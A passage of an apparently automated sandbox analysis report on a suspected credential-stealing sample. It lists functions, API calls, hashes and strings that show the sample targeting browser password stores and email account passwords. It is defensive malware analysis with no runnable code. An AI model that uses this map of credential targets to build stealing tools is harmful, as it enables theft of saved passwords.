                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                              Non-executed Functions

                                                                                                              Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                              • API String ID: 3963849919-1658304561
                                                                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                              Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                              • memset.MSVCRT ref: 0040E5B8
                                                                                                              • memset.MSVCRT ref: 0040E5CD
                                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                              • memset.MSVCRT ref: 0040E6B5
                                                                                                              • memset.MSVCRT ref: 0040E6CC
                                                                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                              • memset.MSVCRT ref: 0040E736
                                                                                                              • memset.MSVCRT ref: 0040E74F
                                                                                                              • sprintf.MSVCRT ref: 0040E76D
                                                                                                              • sprintf.MSVCRT ref: 0040E788
                                                                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                              • memset.MSVCRT ref: 0040E858
                                                                                                              • sprintf.MSVCRT ref: 0040E873
                                                                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                              • API String ID: 4171719235-3943159138
                                                                                                              • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                              • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                              Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                              • GetDC.USER32 ref: 004104E2
                                                                                                              • strlen.MSVCRT ref: 00410522
                                                                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                              • sprintf.MSVCRT ref: 00410640
                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                              • String ID: %s:$EDIT$STATIC
                                                                                                              • API String ID: 1703216249-3046471546
                                                                                                              • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                              • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                              Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004024F5
                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                              • _mbscpy.MSVCRT(?,00000000,?,?,?,7686EB20,?,00000000), ref: 00402533
                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy$QueryValuememset
                                                                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                              • API String ID: 168965057-606283353
                                                                                                              • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                              • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                              Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                              • memset.MSVCRT ref: 0040128E
                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2998058495-0
                                                                                                              • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                              • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                              Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                              • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                              • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                              • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                              • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                              • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$memcpy
                                                                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                              • API String ID: 231171946-2189169393
                                                                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                              Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                              • API String ID: 633282248-1996832678
                                                                                                              • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                              • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                              Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sprintf$memset$_mbscpy
                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                              • API String ID: 3402215030-3842416460
                                                                                                              • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                              • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                              Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                              • strlen.MSVCRT ref: 0040F139
                                                                                                              • strlen.MSVCRT ref: 0040F147
                                                                                                              • memset.MSVCRT ref: 0040F187
                                                                                                              • strlen.MSVCRT ref: 0040F196
                                                                                                              • strlen.MSVCRT ref: 0040F1A4
                                                                                                              • memset.MSVCRT ref: 0040F1EA
                                                                                                              • strlen.MSVCRT ref: 0040F1F9
                                                                                                              • strlen.MSVCRT ref: 0040F207
                                                                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                              • API String ID: 2003275452-3138536805
                                                                                                              • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                              • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                              Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040C3F7
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                              • strrchr.MSVCRT ref: 0040C417
                                                                                                              • _mbscat.MSVCRT ref: 0040C431
                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                              • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                              • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                              • API String ID: 1012775001-1343505058
                                                                                                              • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                              • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                              Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00444612
                                                                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                              • strlen.MSVCRT ref: 0044462E
                                                                                                              • memset.MSVCRT ref: 00444668
                                                                                                              • memset.MSVCRT ref: 0044467C
                                                                                                              • memset.MSVCRT ref: 00444690
                                                                                                              • memset.MSVCRT ref: 004446B6
                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                              • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                              • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                                                                              • String ID: salu
                                                                                                              • API String ID: 3691931180-4177317985
                                                                                                              • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                              • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                              Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
